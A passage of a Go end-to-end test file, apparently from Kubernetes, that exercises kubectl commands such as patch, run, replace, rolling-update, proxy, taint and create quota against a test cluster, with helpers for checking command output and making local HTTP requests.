framework.Failf("expected %q to be RFC3339 or RFC3339Nano", words[0])
}
}
By("restricting to a time range")
// Note: we must wait at least two seconds,
// because the granularity is only 1 second and
// it could end up rounding the wrong way.
time.Sleep(2500 * time.Millisecond) // ensure that startup logs on the node are seen as older than 1s
recent_out := framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--since=1s")
recent := len(strings.Split(recent_out, "\n"))
older_out := framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--since=24h")
older := len(strings.Split(older_out, "\n"))
Expect(recent).To(BeNumerically("<", older), "expected recent(%v) to be less than older(%v)\nrecent lines:\n%v\nolder lines:\n%v\n", recent, older, recent_out, older_out)
})
})
})
framework.KubeDescribe("Kubectl patch", func() {
/*
Release : v1.9
Testname: Kubectl, patch to annotate
Description: Start running a redis master and a replication controller. When the pod is running, add annotations using the ‘kubectl patch’ command. The annotation MUST be added to the running pods, and the added annotations SHOULD be readable from each of the Pods running under the replication controller.
*/
framework.ConformanceIt("should add annotations for pods in rc ", func() {
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("creating Redis RC")
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
By("patching all pods")
forEachPod(func(pod v1.Pod) {
framework.RunKubectlOrDie("patch", "pod", pod.Name, nsFlag, "-p", "{\"metadata\":{\"annotations\":{\"x\":\"y\"}}}")
})
By("checking annotations")
forEachPod(func(pod v1.Pod) {
found := false
for key, val := range pod.Annotations {
if key == "x" && val == "y" {
found = true
break
}
}
if !found {
framework.Failf("Added annotation not found")
}
})
})
})
framework.KubeDescribe("Kubectl version", func() {
/*
Release : v1.9
Testname: Kubectl, version
Description: The command ‘kubectl version’ MUST return the major and minor versions, the GitCommit, etc. of both the Client and the Server that kubectl is configured to connect to.
*/
framework.ConformanceIt("should check is all data is printed ", func() {
version := framework.RunKubectlOrDie("version")
requiredItems := []string{"Client Version:", "Server Version:", "Major:", "Minor:", "GitCommit:"}
for _, item := range requiredItems {
if !strings.Contains(version, item) {
framework.Failf("Required item %s not found in %s", item, version)
}
}
})
})
framework.KubeDescribe("Kubectl run default", func() {
var nsFlag string
var name string
var cleanUp func()
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
name = "e2e-test-nginx-deployment"
cleanUp = func() { framework.RunKubectlOrDie("delete", "deployment", name, nsFlag) }
})
AfterEach(func() {
cleanUp()
})
/*
Release : v1.9
Testname: Kubectl, run default
Description: Command ‘kubectl run’ MUST create a running pod with possible replicas given an image using the option --image=’nginx’. The running Pod SHOULD have one container and the container SHOULD be running the image specified in the ‘run’ command.
*/
framework.ConformanceIt("should create an rc or deployment from an image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", name, "--image="+nginxImage, nsFlag)
By("verifying the pod controlled by " + name + " gets created")
label := labels.SelectorFromSet(labels.Set(map[string]string{"run": name}))
podlist, err := framework.WaitForPodsWithLabel(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod controlled by %s: %v", name, err)
}
pods := podlist.Items
if pods == nil || len(pods) != 1 || len(pods[0].Spec.Containers) != 1 || pods[0].Spec.Containers[0].Image != nginxImage {
framework.RunKubectlOrDie("get", "pods", "-L", "run", nsFlag)
framework.Failf("Failed creating 1 pod with expected image %s. Number of pods = %v", nginxImage, len(pods))
}
})
})
framework.KubeDescribe("Kubectl run rc", func() {
var nsFlag string
var rcName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
rcName = "e2e-test-nginx-rc"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "rc", rcName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, run rc
Description: Command ‘kubectl run’ MUST create a running rc with a default of one replica given an image using the option --image=’nginx’. The running replication controller SHOULD have one container and the container SHOULD be running the image specified in the ‘run’ command. Also there MUST be 1 pod controlled by this replication controller running 1 container with the image specified. A ‘kubectl logs’ command MUST return the logs from the container in the replication controller.
*/
framework.ConformanceIt("should create an rc from an image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", rcName, "--image="+nginxImage, "--generator=run/v1", nsFlag)
By("verifying the rc " + rcName + " was created")
rc, err := c.CoreV1().ReplicationControllers(ns).Get(rcName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting rc %s: %v", rcName, err)
}
containers := rc.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating rc %s for 1 pod with expected image %s", rcName, nginxImage)
}
By("verifying the pod controlled by rc " + rcName + " was created")
label := labels.SelectorFromSet(labels.Set(map[string]string{"run": rcName}))
podlist, err := framework.WaitForPodsWithLabel(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod controlled by rc %s: %v", rcName, err)
}
pods := podlist.Items
if pods == nil || len(pods) != 1 || len(pods[0].Spec.Containers) != 1 || pods[0].Spec.Containers[0].Image != nginxImage {
framework.RunKubectlOrDie("get", "pods", "-L", "run", nsFlag)
framework.Failf("Failed creating 1 pod with expected image %s. Number of pods = %v", nginxImage, len(pods))
}
By("confirm that you can get logs from an rc")
podNames := []string{}
for _, pod := range pods {
podNames = append(podNames, pod.Name)
}
if !framework.CheckPodsRunningReady(c, ns, podNames, framework.PodStartTimeout) {
framework.Failf("Pods for rc %s were not ready", rcName)
}
_, err = framework.RunKubectl("logs", "rc/"+rcName, nsFlag)
// a non-nil error is fine as long as we actually found a pod.
if err != nil && !strings.Contains(err.Error(), " in pod ") {
framework.Failf("Failed getting logs by rc %s: %v", rcName, err)
}
})
})
framework.KubeDescribe("Kubectl rolling-update", func() {
var nsFlag string
var rcName string
var c clientset.Interface
BeforeEach(func() {
c = f.ClientSet
nsFlag = fmt.Sprintf("--namespace=%v", ns)
rcName = "e2e-test-nginx-rc"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "rc", rcName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, rolling update
Description: Command ‘kubectl rolling-update’ MUST replace the specified replication controller with a new replication controller by updating one pod at a time to use the new Pod spec.
*/
framework.ConformanceIt("should support rolling-update to same image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", rcName, "--image="+nginxImage, "--generator=run/v1", nsFlag)
By("verifying the rc " + rcName + " was created")
rc, err := c.CoreV1().ReplicationControllers(ns).Get(rcName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting rc %s: %v", rcName, err)
}
containers := rc.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating rc %s for 1 pod with expected image %s", rcName, nginxImage)
}
framework.WaitForRCToStabilize(c, ns, rcName, framework.PodStartTimeout)
By("rolling-update to same image controller")
debugDiscovery()
runKubectlRetryOrDie("rolling-update", rcName, "--update-period=1s", "--image="+nginxImage, "--image-pull-policy="+string(v1.PullIfNotPresent), nsFlag)
framework.ValidateController(c, nginxImage, 1, rcName, "run="+rcName, noOpValidatorFn, ns)
})
})
framework.KubeDescribe("Kubectl run deployment", func() {
var nsFlag string
var dName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
dName = "e2e-test-nginx-deployment"
})
AfterEach(func() {
err := wait.Poll(framework.Poll, 2*time.Minute, func() (bool, error) {
out, err := framework.RunKubectl("delete", "deployment", dName, nsFlag)
if err != nil {
if strings.Contains(err.Error(), "could not find default credentials") {
err = nil
}
return false, fmt.Errorf("kubectl delete failed output: %s, err: %v", out, err)
}
return true, nil
})
Expect(err).NotTo(HaveOccurred())
})
/*
Release : v1.9
Testname: Kubectl, run deployment
Description: Command ‘kubectl run’ MUST create a deployment, with --generator=deployment, when an image name is specified in the run command. After the run command there SHOULD be a deployment that exists with one container running the specified image. Also there SHOULD be a Pod that is controlled by this deployment, with a container running the specified image.
*/
framework.ConformanceIt("should create a deployment from an image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", dName, "--image="+nginxImage, "--generator=deployment/v1beta1", nsFlag)
By("verifying the deployment " + dName + " was created")
d, err := c.ExtensionsV1beta1().Deployments(ns).Get(dName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting deployment %s: %v", dName, err)
}
containers := d.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating deployment %s for 1 pod with expected image %s", dName, nginxImage)
}
By("verifying the pod controlled by deployment " + dName + " was created")
label := labels.SelectorFromSet(labels.Set(map[string]string{"run": dName}))
podlist, err := framework.WaitForPodsWithLabel(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod controlled by deployment %s: %v", dName, err)
}
pods := podlist.Items
if pods == nil || len(pods) != 1 || len(pods[0].Spec.Containers) != 1 || pods[0].Spec.Containers[0].Image != nginxImage {
framework.RunKubectlOrDie("get", "pods", "-L", "run", nsFlag)
framework.Failf("Failed creating 1 pod with expected image %s. Number of pods = %v", nginxImage, len(pods))
}
})
})
framework.KubeDescribe("Kubectl run job", func() {
var nsFlag string
var jobName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
jobName = "e2e-test-nginx-job"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "jobs", jobName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, run job
Description: Command ‘kubectl run’ MUST create a job, with --generator=job, when an image name is specified in the run command. After the run command there SHOULD be a job that exists with one container running the specified image. Also there SHOULD be a restart policy on the job spec that SHOULD match the command line.
*/
framework.ConformanceIt("should create a job from an image when restart is OnFailure ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", jobName, "--restart=OnFailure", "--generator=job/v1", "--image="+nginxImage, nsFlag)
By("verifying the job " + jobName + " was created")
job, err := c.BatchV1().Jobs(ns).Get(jobName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting job %s: %v", jobName, err)
}
containers := job.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating job %s for 1 pod with expected image %s: %#v", jobName, nginxImage, containers)
}
if job.Spec.Template.Spec.RestartPolicy != v1.RestartPolicyOnFailure {
framework.Failf("Failed creating a job with correct restart policy for --restart=OnFailure")
}
})
})
framework.KubeDescribe("Kubectl run CronJob", func() {
var nsFlag string
var cjName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
cjName = "e2e-test-echo-cronjob-beta"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "cronjobs", cjName, nsFlag)
})
It("should create a CronJob", func() {
framework.SkipIfMissingResource(f.DynamicClient, CronJobGroupVersionResourceBeta, f.Namespace.Name)
schedule := "*/5 * * * ?"
framework.RunKubectlOrDie("run", cjName, "--restart=OnFailure", "--generator=cronjob/v1beta1",
"--schedule="+schedule, "--image="+busyboxImage, nsFlag)
By("verifying the CronJob " + cjName + " was created")
cj, err := c.BatchV1beta1().CronJobs(ns).Get(cjName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting CronJob %s: %v", cjName, err)
}
if cj.Spec.Schedule != schedule {
framework.Failf("Failed creating a CronJob with correct schedule %s", schedule)
}
containers := cj.Spec.JobTemplate.Spec.Template.Spec.Containers
if checkContainersImage(containers, busyboxImage) {
framework.Failf("Failed creating CronJob %s for 1 pod with expected image %s: %#v", cjName, busyboxImage, containers)
}
if cj.Spec.JobTemplate.Spec.Template.Spec.RestartPolicy != v1.RestartPolicyOnFailure {
framework.Failf("Failed creating a CronJob with correct restart policy for --restart=OnFailure")
}
})
})
framework.KubeDescribe("Kubectl run pod", func() {
var nsFlag string
var podName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
podName = "e2e-test-nginx-pod"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "pods", podName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, run pod
Description: Command ‘kubectl run’ MUST create a pod, with --generator=run-pod, when an image name is specified in the run command. After the run command there SHOULD be a pod that exists with one container running the specified image.
*/
framework.ConformanceIt("should create a pod from an image when restart is Never ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", podName, "--restart=Never", "--generator=run-pod/v1", "--image="+nginxImage, nsFlag)
By("verifying the pod " + podName + " was created")
pod, err := c.CoreV1().Pods(ns).Get(podName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting pod %s: %v", podName, err)
}
containers := pod.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating pod %s with expected image %s", podName, nginxImage)
}
if pod.Spec.RestartPolicy != v1.RestartPolicyNever {
framework.Failf("Failed creating a pod with correct restart policy for --restart=Never")
}
})
})
framework.KubeDescribe("Kubectl replace", func() {
var nsFlag string
var podName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
podName = "e2e-test-nginx-pod"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "pods", podName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, replace
Description: Command ‘kubectl replace’ on an existing Pod with a new spec MUST update the image of the container running in the Pod. The -f option to ‘kubectl replace’ SHOULD force re-creation of the resource. The new Pod SHOULD have the container with the new image.
*/
framework.ConformanceIt("should update a single-container pod's image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", podName, "--generator=run-pod/v1", "--image="+nginxImage, "--labels=run="+podName, nsFlag)
By("verifying the pod " + podName + " is running")
label := labels.SelectorFromSet(labels.Set(map[string]string{"run": podName}))
err := testutils.WaitForPodsWithLabelRunning(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod %s: %v", podName, err)
}
By("verifying the pod " + podName + " was created")
podJson := framework.RunKubectlOrDie("get", "pod", podName, nsFlag, "-o", "json")
if !strings.Contains(podJson, podName) {
framework.Failf("Failed to find pod %s in [%s]", podName, podJson)
}
By("replace the image in the pod")
podJson = strings.Replace(podJson, nginxImage, busyboxImage, 1)
framework.RunKubectlOrDieInput(podJson, "replace", "-f", "-", nsFlag)
By("verifying the pod " + podName + " has the right image " + busyboxImage)
pod, err := c.CoreV1().Pods(ns).Get(podName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting deployment %s: %v", podName, err)
}
containers := pod.Spec.Containers
if checkContainersImage(containers, busyboxImage) {
framework.Failf("Failed creating pod with expected image %s", busyboxImage)
}
})
})
framework.KubeDescribe("Kubectl run --rm job", func() {
jobName := "e2e-test-rm-busybox-job"
/*
Release : v1.9
Testname: Kubectl, run job with --rm
Description: Start a job with a Pod using ‘kubectl run’ but specify --rm=true. Wait for the Pod to start running by verifying that there is output as expected. Then verify that the job has exited and cannot be found. With the --rm=true option the job MUST start by running the specified image and then delete itself once it has finished.
*/
framework.ConformanceIt("should create a job from an image, then delete the job ", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("executing a command with run --rm and attach with stdin")
t := time.NewTimer(runJobTimeout)
defer t.Stop()
runOutput := framework.NewKubectlCommand(nsFlag, "run", jobName, "--image="+busyboxImage, "--rm=true", "--generator=job/v1", "--restart=OnFailure", "--attach=true", "--stdin", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234").
WithTimeout(t.C).
ExecOrDie()
Expect(runOutput).To(ContainSubstring("abcd1234"))
Expect(runOutput).To(ContainSubstring("stdin closed"))
err := framework.WaitForJobGone(c, ns, jobName, wait.ForeverTestTimeout)
Expect(err).NotTo(HaveOccurred())
By("verifying the job " + jobName + " was deleted")
_, err = c.BatchV1().Jobs(ns).Get(jobName, metav1.GetOptions{})
Expect(err).To(HaveOccurred())
Expect(apierrs.IsNotFound(err)).To(BeTrue())
})
})
framework.KubeDescribe("Proxy server", func() {
// TODO: test proxy options (static, prefix, etc)
/*
Release : v1.9
Testname: Kubectl, proxy port zero
Description: Start a proxy server on port zero by running ‘kubectl proxy’ with --port=0. Call the proxy server by requesting the api versions over HTTP on the chosen port. The proxy server MUST provide at least one version string.
*/
framework.ConformanceIt("should support proxy with --port 0 ", func() {
By("starting the proxy server")
port, cmd, err := startProxyServer()
if cmd != nil {
defer framework.TryKill(cmd)
}
if err != nil {
framework.Failf("Failed to start proxy server: %v", err)
}
By("curling proxy /api/ output")
localAddr := fmt.Sprintf("http://localhost:%d/api/", port)
apiVersions, err := getAPIVersions(localAddr)
if err != nil {
framework.Failf("Expected at least one supported apiversion, got error %v", err)
}
if len(apiVersions.Versions) < 1 {
framework.Failf("Expected at least one supported apiversion, got %v", apiVersions)
}
})
/*
Release : v1.9
Testname: Kubectl, proxy socket
Description: Start a proxy server by running ‘kubectl proxy’ with --unix-socket=<some path>. Call the proxy server by requesting the api versions over the unix socket. The proxy server MUST provide at least one version string.
*/
framework.ConformanceIt("should support --unix-socket=/path ", func() {
By("Starting the proxy")
tmpdir, err := ioutil.TempDir("", "kubectl-proxy-unix")
if err != nil {
framework.Failf("Failed to create temporary directory: %v", err)
}
path := filepath.Join(tmpdir, "test")
defer os.Remove(path)
defer os.Remove(tmpdir)
cmd := framework.KubectlCmd("proxy", fmt.Sprintf("--unix-socket=%s", path))
stdout, stderr, err := framework.StartCmdAndStreamOutput(cmd)
if err != nil {
framework.Failf("Failed to start kubectl command: %v", err)
}
defer stdout.Close()
defer stderr.Close()
defer framework.TryKill(cmd)
buf := make([]byte, 128)
if _, err = stdout.Read(buf); err != nil {
framework.Failf("Expected output from kubectl proxy: %v", err)
}
By("retrieving proxy /api/ output")
_, err = curlUnix("http://unused/api", path)
if err != nil {
framework.Failf("Failed get of /api at %s: %v", path, err)
}
})
})
// This test must run [Serial] because it modifies the node so it doesn't allow pods to execute on
// it, which will affect anything else running in parallel.
framework.KubeDescribe("Kubectl taint [Serial]", func() {
It("should update the taint on a node", func() {
testTaint := v1.Taint{
Key: fmt.Sprintf("kubernetes.io/e2e-taint-key-001-%s", string(uuid.NewUUID())),
Value: "testing-taint-value",
Effect: v1.TaintEffectNoSchedule,
}
nodeName := scheduling.GetNodeThatCanRunPod(f)
By("adding the taint " + testTaint.ToString() + " to a node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, testTaint)
By("verifying the node has the taint " + testTaint.ToString())
output := runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings := [][]string{
{"Name:", nodeName},
{"Taints:"},
{testTaint.ToString()},
}
checkOutput(output, requiredStrings)
By("removing the taint " + testTaint.ToString() + " of a node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.Key+":"+string(testTaint.Effect)+"-")
By("verifying the node doesn't have the taint " + testTaint.Key)
output = runKubectlRetryOrDie("describe", "node", nodeName)
if strings.Contains(output, testTaint.Key) {
framework.Failf("Failed removing taint " + testTaint.Key + " of the node " + nodeName)
}
})
It("should remove all the taints with the same key off a node", func() {
testTaint := v1.Taint{
Key: fmt.Sprintf("kubernetes.io/e2e-taint-key-002-%s", string(uuid.NewUUID())),
Value: "testing-taint-value",
Effect: v1.TaintEffectNoSchedule,
}
nodeName := scheduling.GetNodeThatCanRunPod(f)
By("adding the taint " + testTaint.ToString() + " to a node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, testTaint)
By("verifying the node has the taint " + testTaint.ToString())
output := runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings := [][]string{
{"Name:", nodeName},
{"Taints:"},
{testTaint.ToString()},
}
checkOutput(output, requiredStrings)
newTestTaint := v1.Taint{
Key: testTaint.Key,
Value: "another-testing-taint-value",
Effect: v1.TaintEffectPreferNoSchedule,
}
By("adding another taint " + newTestTaint.ToString() + " to the node")
runKubectlRetryOrDie("taint", "nodes", nodeName, newTestTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, newTestTaint)
By("verifying the node has the taint " + newTestTaint.ToString())
output = runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings = [][]string{
{"Name:", nodeName},
{"Taints:"},
{newTestTaint.ToString()},
}
checkOutput(output, requiredStrings)
noExecuteTaint := v1.Taint{
Key: testTaint.Key,
Value: "testing-taint-value-no-execute",
Effect: v1.TaintEffectNoExecute,
}
By("adding NoExecute taint " + noExecuteTaint.ToString() + " to the node")
runKubectlRetryOrDie("taint", "nodes", nodeName, noExecuteTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, noExecuteTaint)
By("verifying the node has the taint " + noExecuteTaint.ToString())
output = runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings = [][]string{
{"Name:", nodeName},
{"Taints:"},
{noExecuteTaint.ToString()},
}
checkOutput(output, requiredStrings)
By("removing all taints that have the same key " + testTaint.Key + " of the node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.Key+"-")
By("verifying the node doesn't have the taints that have the same key " + testTaint.Key)
output = runKubectlRetryOrDie("describe", "node", nodeName)
if strings.Contains(output, testTaint.Key) {
framework.Failf("Failed removing taints " + testTaint.Key + " of the node " + nodeName)
}
})
})
framework.KubeDescribe("Kubectl create quota", func() {
It("should create a quota without scopes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
quotaName := "million"
By("calling kubectl quota")
framework.RunKubectlOrDie("create", "quota", quotaName, "--hard=pods=1000000,services=1000000", nsFlag)
By("verifying that the quota was created")
quota, err := c.CoreV1().ResourceQuotas(ns).Get(quotaName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting quota %s: %v", quotaName, err)
}
if len(quota.Spec.Scopes) != 0 {
framework.Failf("Expected empty scopes, got %v", quota.Spec.Scopes)
}
if len(quota.Spec.Hard) != 2 {
framework.Failf("Expected two resources, got %v", quota.Spec.Hard)
}
r, found := quota.Spec.Hard[v1.ResourcePods]
if expected := resource.MustParse("1000000"); !found || (&r).Cmp(expected) != 0 {
framework.Failf("Expected pods=1000000, got %v", r)
}
r, found = quota.Spec.Hard[v1.ResourceServices]
if expected := resource.MustParse("1000000"); !found || (&r).Cmp(expected) != 0 {
framework.Failf("Expected services=1000000, got %v", r)
}
})
It("should create a quota with scopes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
quotaName := "scopes"
By("calling kubectl quota")
framework.RunKubectlOrDie("create", "quota", quotaName, "--hard=pods=1000000", "--scopes=BestEffort,NotTerminating", nsFlag)
By("verifying that the quota was created")
quota, err := c.CoreV1().ResourceQuotas(ns).Get(quotaName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting quota %s: %v", quotaName, err)
}
if len(quota.Spec.Scopes) != 2 {
framework.Failf("Expected two scopes, got %v", quota.Spec.Scopes)
}
scopes := make(map[v1.ResourceQuotaScope]struct{})
for _, scope := range quota.Spec.Scopes {
scopes[scope] = struct{}{}
}
if _, found := scopes[v1.ResourceQuotaScopeBestEffort]; !found {
framework.Failf("Expected BestEffort scope, got %v", quota.Spec.Scopes)
}
if _, found := scopes[v1.ResourceQuotaScopeNotTerminating]; !found {
framework.Failf("Expected NotTerminating scope, got %v", quota.Spec.Scopes)
}
})
It("should reject quota with invalid scopes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
quotaName := "scopes"
By("calling kubectl quota")
out, err := framework.RunKubectl("create", "quota", quotaName, "--hard=hard=pods=1000000", "--scopes=Foo", nsFlag)
if err == nil {
framework.Failf("Expected kubectl to fail, but it succeeded: %s", out)
}
})
})
})
// Checks whether the output split by line contains the required elements.
func checkOutputReturnError(output string, required [][]string) error {
outputLines := strings.Split(output, "\n")
currentLine := 0
for _, requirement := range required {
for currentLine < len(outputLines) && !strings.Contains(outputLines[currentLine], requirement[0]) {
currentLine++
}
if currentLine == len(outputLines) {
return fmt.Errorf("failed to find %s in %s", requirement[0], output)
}
for _, item := range requirement[1:] {
if !strings.Contains(outputLines[currentLine], item) {
return fmt.Errorf("failed to find %s in %s", item, outputLines[currentLine])
}
}
}
return nil
}
func checkOutput(output string, required [][]string) {
err := checkOutputReturnError(output, required)
if err != nil {
framework.Failf("%v", err)
}
}
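// checkKubectlOutputWithRetry reruns the given kubectl command (for up to a minute) until its output contains all required strings, failing the test if it never does.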
func checkKubectlOutputWithRetry(required [][]string, args ...string) {
var pollErr error
wait.PollImmediate(time.Second, time.Minute, func() (bool, error) {
output := framework.RunKubectlOrDie(args...)
err := checkOutputReturnError(output, required)
if err != nil {
pollErr = err
return false, nil
}
pollErr = nil
return true, nil
})
if pollErr != nil {
framework.Failf("%v", pollErr)
}
}
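// checkContainersImage returns true when the container list does NOT consist of exactly one container running expectImage; callers treat a true result as a failure.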
func checkContainersImage(containers []v1.Container, expectImage string) bool {
return containers == nil || len(containers) != 1 || containers[0].Image != expectImage
}
func getAPIVersions(apiEndpoint string) (*metav1.APIVersions, error) {
body, err := curl(apiEndpoint)
if err != nil {
return nil, fmt.Errorf("Failed http.Get of %s: %v", apiEndpoint, err)
}
var apiVersions metav1.APIVersions
if err := json.Unmarshal([]byte(body), &apiVersions); err != nil {
return nil, fmt.Errorf("Failed to parse /api output %s: %v", body, err)
}
return &apiVersions, nil
}
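// startProxyServer starts "kubectl proxy" on an OS-assigned port, parses the chosen port from its stdout, and returns the port together with the running command so the caller can clean it up.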
func startProxyServer() (int, *exec.Cmd, error) {
// Specifying port 0 indicates we want the os to pick a random port.
cmd := framework.KubectlCmd("proxy", "-p", "0", "--disable-filter")
stdout, stderr, err := framework.StartCmdAndStreamOutput(cmd)
if err != nil {
return -1, nil, err
}
defer stdout.Close()
defer stderr.Close()
buf := make([]byte, 128)
var n int
if n, err = stdout.Read(buf); err != nil {
return -1, cmd, fmt.Errorf("Failed to read from kubectl proxy stdout: %v", err)
}
output := string(buf[:n])
match := proxyRegexp.FindStringSubmatch(output)
if len(match) == 2 {
if port, err := strconv.Atoi(match[1]); err == nil {
return port, cmd, nil
}
}
return -1, cmd, fmt.Errorf("Failed to parse port from proxy stdout: %s", output)
}
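// curlUnix performs an HTTP GET for url over the unix domain socket at path; the URL host is ignored by the custom dialer.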
func curlUnix(url string, path string) (string, error) {
dial := func(ctx context.Context, proto, addr string) (net.Conn, error) {
var d net.Dialer
return d.DialContext(ctx, "unix", path)
}
transport := utilnet.SetTransportDefaults(&http.Transport{
DialContext: dial,
})
return curlTransport(url, transport)
}
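// curlTransport performs an HTTP GET for url using the supplied transport and returns the response body as a string.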
func curlTransport(url string, transport *http.Transport) (string, error) {
client := &http.Client{Transport: transport}
resp, err := client.Get(url)
if err != nil {
return "", err
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return "", err
}
return string(body[:]), nil
}
func curl(url string) (string, error) {
return curlTransport(url, utilnet.SetTransportDefaults(&http.Transport{}))
}
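// validateGuestbookApp waits for the guestbook frontend pods to be Running, then exercises the app end to end: wait for it to serve content, add an entry, and read the entry back.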
func validateGuestbookApp(c clientset.Interface, ns string) {
framework.Logf("Waiting for all frontend pods to be Running.")
label := labels.SelectorFromSet(labels.Set(map[string]string{"tier": "frontend", "app": "guestbook"}))
err := testutils.WaitForPodsWithLabelRunning(c, ns, label)
Expect(err).NotTo(HaveOccurred())
framework.Logf("Waiting for frontend to serve content.")
if !waitForGuestbookResponse(c, "get", "", `{"data": ""}`, guestbookStartupTimeout, ns) {
framework.Failf("Frontend service did not start serving content in %v seconds.", guestbookStartupTimeout.Seconds())
}
framework.Logf("Trying to add a new entry to the guestbook.")
if !waitForGuestbookResponse(c, "set", "TestEntry", `{"message": "Updated"}`, guestbookResponseTimeout, ns) {
framework.Failf("Cannot added new entry in %v seconds.", guestbookResponseTimeout.Seconds())
}
framework.Logf("Verifying that added entry can be retrieved.")
if !waitForGuestbookResponse(c, "get", "", `{"data": "TestEntry"}`, guestbookResponseTimeout, ns) {
framework.Failf("Entry to guestbook wasn't correctly added in %v seconds.", guestbookResponseTimeout.Seconds())
}
}
// Returns whether received expected response from guestbook on time.
func waitForGuestbookResponse(c clientset.Interface, cmd, arg, expectedResponse string, timeout time.Duration, ns string) bool {
for start := time.Now(); time.Since(start) < timeout; time.Sleep(5 * time.Second) {
res, err := makeRequestToGuestbook(c, cmd, arg, ns)
if err == nil && res == expectedResponse {
return true
}
framework.Logf("Failed to get response from guestbook. err: %v, response: %s", err, res)
}
return false
}
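// makeRequestToGuestbook calls the guestbook frontend's /guestbook.php through the API server services proxy with the given cmd and value, returning the raw response body.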
func makeRequestToGuestbook(c clientset.Interface, cmd, value string, ns string) (string, error) {
proxyRequest, errProxy := framework.GetServicesProxyRequest(c, c.CoreV1().RESTClient().Get())
if errProxy != nil {
return "", errProxy
}
ctx, cancel := context.WithTimeout(context.Background(), framework.SingleCallTimeout)
defer cancel()
result, err := proxyRequest.Namespace(ns).
Context(ctx).
Name("frontend").
Suffix("/guestbook.php").
Param("cmd", cmd).
Param("key", "messages").
Param("value", value).
Do().
Raw()
return string(result), err
}
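// updateDemoData models the JSON payload served at data.json by the update-demo containers.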
type updateDemoData struct {
Image string
}
const applyTestLabel = "kubectl.kubernetes.io/apply-test"
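// readReplicationControllerFromString unmarshals a YAML manifest into a ReplicationController, failing the test on parse errors.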
func readReplicationControllerFromString(contents string) *v1.ReplicationController {
rc := v1.ReplicationController{}
if err := yaml.Unmarshal([]byte(contents), &rc); err != nil {
framework.Failf(err.Error())
}
return &rc
}
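// modifyReplicationControllerConfiguration adds the applyTestLabel marker to the RC's labels, selector and pod template labels, and returns the modified manifest as JSON.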
func modifyReplicationControllerConfiguration(contents string) io.Reader {
rc := readReplicationControllerFromString(contents)
rc.Labels[applyTestLabel] = "ADDED"
rc.Spec.Selector[applyTestLabel] = "ADDED"
rc.Spec.Template.Labels[applyTestLabel] = "ADDED"
data, err := json.Marshal(rc)
if err != nil {
framework.Failf("json marshal failed: %s\n", err)
}
